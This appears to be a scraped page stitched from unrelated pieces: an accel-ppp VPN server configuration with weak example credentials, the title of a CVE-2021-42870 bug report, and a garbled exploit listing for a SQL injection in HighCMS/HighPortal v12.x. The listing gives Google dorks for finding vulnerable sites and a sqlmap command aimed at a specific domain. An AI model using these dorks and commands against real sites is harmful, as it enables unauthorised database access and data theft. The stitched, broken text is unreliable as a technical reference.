     
     #ipv6_nd
     #ipv6_dhcp
     #ipv6pool
     
     [core]
     log-error=/var/log/accel-ppp/core.log
     thread-count=4
     
     [common]
     #single-session=replace
     #single-session-ignore-case=0
     #sid-case=upper
     #sid-source=seq
     #max-sessions=1000
     #max-starting=0
     #check-ip=0
     
     [ppp]
     verbose=1
     min-mtu=1280
     mtu=1400
     mru=1400
     #accomp=deny
     #pcomp=deny
     #ccp=0
     #mppe=require
     ipv4=require
     ipv6=deny
     ipv6-intf-id=0:0:0:1
     ipv6-peer-intf-id=0:0:0:2
     ipv6-accept-peer-intf-id=1
     lcp-echo-interval=20
     #lcp-echo-failure=3
     lcp-echo-timeout=120
     unit-cache=1
     #unit-preallocate=1
     
     [auth]
     #any-login=0
     #noauth=0
     
     [pptp]
     verbose=1
     #echo-interval=30
     ip-pool=pool1
     #ipv6-pool=pptp
     #ipv6-pool-delegate=pptp
     ifname=pptp%d
     #port=9300
     #mppe=prefer
     
     [pppoe]
     verbose=1
     #ac-name=xxx
     #service-name=yyy
     #pado-delay=0
     #pado-delay=0,100:100,200:200,-1:500
     called-sid=mac
     #tr101=1
     #padi-limit=0
     #ip-pool=pppoe
     #ipv6-pool=pppoe
     #ipv6-pool-delegate=pppoe
     #ifname=pppoe%d
     #sid-uppercase=0
     #vlan-mon=eth0,10-200
     #vlan-timeout=60
     #vlan-name=%I.%N
     #interface=eth1,padi-limit=1000
     interface=ens18
     
     [l2tp]
     verbose=1
     #dictionary=/usr/local/share/accel-ppp/l2tp/dictionary
     #hello-interval=60
     #timeout=60
     #rtimeout=1
     #rtimeout-cap=16
     #retransmit=5
     #recv-window=16
     #host-name=accel-ppp
     #dir300_quirk=0
     #secret=
     #dataseq=allow
     #reorder-timeout=0
     #ip-pool=l2tp
     #ipv6-pool=l2tp
     #ipv6-pool-delegate=l2tp
     #ifname=l2tp%d
     
     [sstp]
     verbose=1
     #cert-hash-proto=sha1,sha256
     #cert-hash-sha1=
     #cert-hash-sha256=
     #accept=ssl,proxy
     #ssl-protocol=tls1,tls1.1,tls1.2,tls1.3
     #ssl-dhparam=/etc/ssl/dhparam.pem
     #ssl-ecdh-curve=prime256v1
     #ssl-ciphers=DEFAULT
     #ssl-prefer-server-ciphers=0
     #ssl-ca-file=/etc/ssl/sstp-ca.crt
     #ssl-pemfile=/etc/ssl/sstp-cert.pem
     #ssl-keyfile=/etc/ssl/sstp-key.pem
     #host-name=domain.tld
     #http-error=allow
     #timeout=60
     #hello-interval=60
     #ip-pool=sstp
     #ipv6-pool=sstp
     #ipv6-pool-delegate=sstp
     #ifname=sstp%d
     
     [ipoe]
     verbose=1
     username=ifname
     #password=username
     lease-time=600
     #renew-time=300
     #rebind-time=525
     max-lease-time=3600
     #unit-cache=1000
     #l4-redirect-table=4
     #l4-redirect-ipset=l4
     #l4-redirect-on-reject=300
     #l4-redirect-ip-pool=pool1
     shared=0
     ifcfg=1
     mode=L2
     start=dhcpv4
     #start=up
     #ip-unnumbered=1
     #proxy-arp=0
     #nat=0
     #proto=100
     #relay=10.10.10.10
     #vendor=Custom
     #weight=0
     #attr-dhcp-client-ip=DHCP-Client-IP-Address
     #attr-dhcp-router-ip=DHCP-Router-IP-Address
     #attr-dhcp-mask=DHCP-Mask
     #attr-dhcp-lease-time=DHCP-Lease-Time
     #attr-dhcp-renew-time=DHCP-Renewal-Time
     #attr-dhcp-rebind-time=DHCP-Rebinding-Time
     #attr-dhcp-opt82=DHCP-Option82
     #attr-dhcp-opt82-remote-id=DHCP-Agent-Remote-Id
     #attr-dhcp-opt82-circuit-id=DHCP-Agent-Circuit-Id
     #attr-l4-redirect=L4-Redirect
     #attr-l4-redirect-table=4
     #attr-l4-redirect-ipset=l4-redirect
     #lua-file=/etc/accel-ppp.lua
     #offer-delay=0,100:100,200:200,-1:1000
     #vlan-mon=eth0,10-200
     #vlan-timeout=60
     #vlan-name=%I.%N
     #ip-pool=ipoe
     #ipv6-pool=ipoe
     #ipv6-pool-delegate=ipoe
     #idle-timeout=0
     #session-timeout=0
     #soft-terminate=0
     #check-mac-change=1
     #calling-sid=mac
     #local-net=192.168.0.0/16
     interface=eth0
     
     [dns]
     #dns1=172.16.0.1
     #dns2=172.16.1.1
     
     [wins]
     #wins1=172.16.0.1
     #wins2=172.16.1.1
     
     [radius]
     #dictionary=/usr/local/share/accel-ppp/radius/dictionary
     nas-identifier=accel-ppp
     nas-ip-address=127.0.0.1
     gw-ip-address=192.168.100.1
     server=127.0.0.1,testing123,auth-port=1812,acct-port=1813,req-limit=50,fail-timeout=0,max-fail=10,weight=1
     dae-server=127.0.0.1:3799,testing123
     verbose=1
     #timeout=3
     #max-try=3
     #acct-timeout=120
     #acct-delay-time=0
     #acct-on=0
     #acct-interim-interval=0
     #acct-interim-jitter=0
     #default-realm=
     #strip-realm=0
     #attr-tunnel-type=My-Tunnel-Type
     
     [client-ip-range]
     0.0.0.0/0
     
     [ip-pool]
     gw-ip-address=192.168.0.1
     #vendor=Cisco
     #attr=Cisco-AVPair
     attr=Framed-Pool
     192.168.0.2-255
     192.168.1.1-255,name=pool1
     192.168.2.1-255,name=pool2
     192.168.3.1-255,name=pool3
     192.168.4.1-255,name=pool4,next=pool1
     192.168.4.0/24
     
     [log]
     log-file=/var/log/accel-ppp/accel-ppp.log
     log-emerg=/var/log/accel-ppp/emerg.log
     log-fail-file=/var/log/accel-ppp/auth-fail.log
     log-debug=/dev/stdout
     syslog=accel-pppd,daemon
     #log-tcp=127.0.0.1:3000
     copy=1
     color=1
     #per-user-dir=per_user
     #per-session-dir=per_session
     #per-session=1
     level=5
     
     [log-pgsql]
     conninfo=user=log
     log-table=log
     
     [pppd-compat]
     verbose=1
     #ip-pre-up=/etc/ppp/ip-pre-up
     ip-up=/etc/ppp/ip-up
     ip-down=/etc/ppp/ip-down
     #ip-change=/etc/ppp/ip-change
     radattr-prefix=/var/run/radattr
     #fork-limit=16
     
     [chap-secrets]
     gw-ip-address=192.168.100.1
     chap-secrets=/etc/ppp/chap-secrets.ppp
     #encrypted=0
     #username-hash=md5
     
     [shaper]
     #attr=Filter-Id
     #down-burst-factor=0.1
     #up-burst-factor=1.0
     #latency=50
     #mpu=0
     #mtu=0
     #r2q=10
     #quantum=1500
     #moderate-quantum=1
     #cburst=1534
     #ifb=ifb0
     up-limiter=police
     down-limiter=tbf
     #leaf-qdisc=sfq perturb 10
     #leaf-qdisc=fq_codel [limit PACKETS] [flows NUMBER] [target TIME] [interval TIME] [quantum BYTES] [[no]ecn]
     #rate-multiplier=1
     #fwmark=1
     #rate-limit=2048/1024
     verbose=1
     
     [cli]
     verbose=1
     telnet=127.0.0.1:2000
     tcp=127.0.0.1:2001
     #password=123
     #sessions-columns=ifname,username,ip,ip6,ip6-dp,type,state,uptime,uptime-raw,calling-sid,called-sid,sid,comp,rx-bytes,tx-bytes,rx-bytes-raw,tx-bytes-raw,rx-pkts,tx-pkts
     
     [snmp]
     master=0
     agent-name=accel-ppp
     
     [connlimit]
     limit=10/min
     burst=3
     timeout=60
     
     [ipv6-pool]
     #gw-ip6-address=fc00:0:1::1
     #vendor=
     #attr-prefix=Delegated-IPv6-Prefix-Pool
     #attr-address=Stateful-IPv6-Address-Pool
     fc00:0:1::/48,64
     fc00:0:2::/48,64,name=pool1
     fc00:0:3::/48,64,name=pool2,next=pool1
     delegate=fc00:1::/36,48
     delegate=fc00:2::/36,48,name=pool3
     delegate=fc00:3::/36,48,name=pool4,next=pool3
     
     [ipv6-dns]
     #fc00:1::1
     #fc00:1::2
     #fc00:1::3
     #dnssl=suffix1.local.net
     #dnssl=suffix2.local.net.
     
     [ipv6-dhcp]
     verbose=1
     pref-lifetime=604800
     valid-lifetime=2592000
     route-via-gw=1
    

use chap-secrets and the /etc/ppp/chap-secrets.ppp is as follows:

    # Secrets for authentication using CHAP
    # client	server	secret			IP addresses
    fouzhe * 123 *

CVE-2021-42870: Abnormal packet sequence can cause stack-buffer-underflow · Issue #158 · xebd/accel-ppp

HighCMS/HighPortal version 12.x appears to suffer from a remote SQL injection vulnerability.

    # Exploit Title: HighCMS/HighPortal v12.x SQL Inj# Type : WEBAPPS "HighCMS/HighPortal"# Platform :  ASP.NET# Date :  4/23/2022# Exploit Author :  E1.Coders# Software Link :  https://aryanic.com/page/portal# Version :  v12.x# Category :  Webapps# Tested on: Linux/Windows# Google Dork: inurl:index.jsp?siteid=1&fkeyid=&siteid=1&pageid= # Google Dork: <©2022 HighCMS/HighPortal" Step 1: Enter the address of the "page" that has the problem of sql injection attacks  http: //TARGET/index.jsp? Siteid = 1 & fkeyid = & siteid = 1 & pageid = 6528 Default credentials.      ( is True )STEP 2 : Send the following request "orUse sqlmap : python sqlmap.py -u "https://example.ir/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=11211"

Tag

#sql